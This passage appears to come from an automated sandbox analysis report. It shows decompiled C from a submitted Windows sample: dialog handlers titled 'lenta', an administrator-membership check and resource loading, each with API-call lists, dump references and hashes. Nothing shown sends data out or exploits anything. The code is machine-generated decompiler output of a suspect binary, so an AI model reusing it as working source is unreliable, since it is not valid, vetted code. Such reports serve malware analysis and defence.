                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0xa98590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0xa98590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E00A943D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0xa98d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0xa988b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E00A930C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A9313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A9314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 00A9316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A93176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A9317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00A93185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00A93190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00A930C0), ref: 00A931A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A931CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                            • Opcode ID: f7e62517c0f203b1db1783790b9c3f190e73328708a383651fb0ee994f28018a
                                                                                                                                                                                                                                            • Instruction ID: 895e9458c4e315d07ccdcdb139f400635ec7b22de0ad2a2398bb7665531fe5a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7e62517c0f203b1db1783790b9c3f190e73328708a383651fb0ee994f28018a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B117F32348221BBDF119BA89C0CB9A3AF4FB5A721F204713F825951F0DF759A42C696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E00A918A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0xa98128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E00A96CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A917EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0xa98128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa98128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a919a9
                                                                                                                                                                                                                                            0x00a9194c
                                                                                                                                                                                                                                            0x00a919a2
                                                                                                                                                                                                                                            0x00a919a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9196e
                                                                                                                                                                                                                                            0x00a91970
                                                                                                                                                                                                                                            0x00a91999
                                                                                                                                                                                                                                            0x00a9199c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9199c
                                                                                                                                                                                                                                            0x00a91972
                                                                                                                                                                                                                                            0x00a91972
                                                                                                                                                                                                                                            0x00a91975
                                                                                                                                                                                                                                            0x00a91984
                                                                                                                                                                                                                                            0x00a91985
                                                                                                                                                                                                                                            0x00a9198a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9198c
                                                                                                                                                                                                                                            0x00a91991
                                                                                                                                                                                                                                            0x00a91996
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91996
                                                                                                                                                                                                                                            0x00a9194c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A918DD), ref: 00A9181A
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A9182C
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: AllocateAndInitializeSid.ADVAPI32(00A918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A918DD), ref: 00A91855
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: FreeSid.ADVAPI32(?,?,?,?,00A918DD), ref: 00A91883
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A918DD), ref: 00A9188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A918EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A918F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A9190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00A91918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A9192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A91944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A91964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 00A9197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00A9199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A919A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A919AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: 38aa62599c6a1f8c65d8271dbeea4eed88ae99aac69008de578fc7cef5e29761
                                                                                                                                                                                                                                            • Instruction ID: f9b4b0c39964eebdc3d24acee4c3d5c2fe6d4e43f2001de64ff82bce7814fa2f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38aa62599c6a1f8c65d8271dbeea4eed88ae99aac69008de578fc7cef5e29761
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3311871B0020AABDF20DFE5DC98AAFBBF8FF15700F20042AE545D2160DB359906CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A9468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$lenta
                                                                                                                                                                                                                                            • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                            • Opcode ID: 96aca75a9b051fbf5405e3ab5f0298e9928cb0f6af38c1c9caeb0b7e5d8c884d
                                                                                                                                                                                                                                            • Instruction ID: 9d9cfc21d34befd617bc1e1335bd0b0addbfc6407c857c45ceb75964476b921e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96aca75a9b051fbf5405e3ab5f0298e9928cb0f6af38c1c9caeb0b7e5d8c884d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0601D1723402207BE7205BE56C4DF6B3E6CDBDAB62F140417FB4A86190CEA1884383E2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E00A917EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0xa9a288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A918DD), ref: 00A9181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A9182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00A918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A918DD), ref: 00A91855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,00A918DD), ref: 00A91883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A918DD), ref: 00A9188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: 8ea42cda60d155b874b81d66151c63b751fbdd4e5be84dc0fc964270e75b6818
                                                                                                                                                                                                                                            • Instruction ID: d2ae7fa2e47dd2e96da184855b3e323dcec41bfc05ddf5d7bd32fdc92e6024eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ea42cda60d155b874b81d66151c63b751fbdd4e5be84dc0fc964270e75b6818
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5118131F00209ABDB10DFA4DC49ABEBBB8EF44701F10456BFA12E6290DE308D018B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A93450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E00A943D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0xa99404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa991dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A93490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A9349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A934B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 00A934C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A934CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 00A934D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 25f5efad86de58d6170530d94ff63d1eb7c70988068b6f6d22acd71a38d91f24
                                                                                                                                                                                                                                            • Instruction ID: 78a44bd075de18e715d94eb13e92715ccdd260d55f59fb6f0fe47dde640acd54
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25f5efad86de58d6170530d94ff63d1eb7c70988068b6f6d22acd71a38d91f24
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2601B132340114ABDF269FA9DC0C96E3AF4EB89702F224126F956865A0CF719F43CBC5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A92AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xa98004; // 0x306ebedf
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xa99a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
